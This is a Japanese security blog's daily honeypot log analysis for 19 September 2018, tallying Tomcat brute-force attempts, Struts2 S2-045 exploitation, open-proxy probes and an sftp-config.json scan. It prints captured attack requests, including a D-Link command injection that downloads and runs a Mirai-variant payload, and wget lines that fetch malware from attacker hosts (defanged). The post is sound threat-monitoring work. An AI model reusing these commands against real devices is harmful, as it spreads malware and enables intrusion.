S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/09/19)

WOWhoneypotの2018/09/19(水) (運用106日目)の簡易分析です。
本日の総アクセス件数は 159件です。

本日の主な内容は以下です。

・(新規)sftp設定ファイルの調査:1件
 →「GET /sftp-config.json」でのアクセスです。アクセスログにそれ以上の情報はありませんでした。
  以下に情報があります。

blog.sucuri.net

www.morihi-soc.net

  他のハニーポッターのところにも同じアクセスは来ているようです。

Tomcat管理ページへのブルートフォース攻撃:52件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:44件
 →同一IPから全件来ていました。ペイロードのダウンロード先はハンティングログ記載の3種類がありました。なぜ同じIPから複数種類来ているのかが気になります。

・不正中継の調査:18件


以下が全アクセスログです。

 

件数 日付 種別 リクエス
52 2018-09-19 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
44 2018-09-19 Apache Struts2脆弱性S2-045(CVE-2017-5638) GET /index.action
39 2018-09-19 アクセス GET /
4 2018-09-19 不正中継の調査 CONNECT www.baidu[.]com:443
3 2018-09-19 不正中継の調査 GET hxxp://www.ip[.]cn/
3 2018-09-19 不正中継の調査 GET hxxp://www.123cha[.]com/
3 2018-09-19 不正中継の調査 CONNECT cn.bing[.]com:443
2 2018-09-19 クローリング GET /robots.txt
2 2018-09-19 不正中継の調査 CONNECT 133.130.126[.]119:43
1 2018-09-19 調査 HEAD /
1 2018-09-19 sftp設定ファイルの調査 GET /sftp-config.json
1 2018-09-19 phpMyAdminの調査 GET /phpmyadmin
1 2018-09-19 D-Linkを狙うMirai亜種 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-19 不正中継の調査 GET hxxp://www.baidu[.]com/
1 2018-09-19 不正中継の調査 GET hxxp://www.123cha[.]com
1 2018-09-19 不正中継の調査 CONNECT www.baidu[.]com

 

本日のドメイン名でのアクセスは以下です。

2 GET /
1 GET /robots.txt

本日のハンティングログは以下です。

件数 日付 リクエス 種別
11 2018-09-19 wget -c hxxp://wap.tfddos[.]net:57843/linux Struts2
10 2018-09-19 wget -c hxxp://222.186.138[.]8:3333/bbbiu Struts2
1 2018-09-19 wget hxxp://185.172.164[.]41/e Mirai亜種
1 2018-09-19 wget -c hxxp://43.226.146[.]23:2422/qbz95  Struts2

 

以上です。